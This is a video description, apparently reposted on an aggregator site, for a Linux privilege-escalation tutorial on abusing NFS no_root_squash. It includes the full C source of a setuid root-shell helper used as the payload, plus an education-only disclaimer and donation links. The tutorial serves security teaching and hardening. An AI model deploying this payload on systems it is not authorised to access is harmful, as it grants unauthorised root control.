Common Linux Privilege Escalation: NFS no_root_squash
Have you seen online guides telling you to enable no_root_squash on your NFS server? That may not be the best idea... Here's how to exploit that in order to go from a low privilege shell to a root shell.
This video is for education purposes only. Do not attempt on systems that you do not own.
This video is a re-upload of an older video in order to fix some audio issues.
SHELL USED (You'll have to add the angle brackets, they aren't allows in a description):
#include stdio.h
#include stdlib.h
#include sys/types.h
#include unistd.h
int main(){
setuid(0);
system("/bin/bash");
return 0;
}
Here is a great write up on this, and where the C shell came from:
https://www.securitynewspaper.com/201...
Follow me on Twitter: / 0xconda
If you found this video helpful and would like to support future creations, please considering visiting the following links:
Patreon: / conda
Buy Me a Coffee: https://www.buymeacoffee.com/conda
Watch video Common Linux Privilege Escalation: NFS no_root_squash online without registration, duration hours minute second in high quality. This video was added by user Conda 14 September 2020, don't forget to share it with your friends and acquaintances, it has been viewed on our site 11,202 once and liked it 197 people.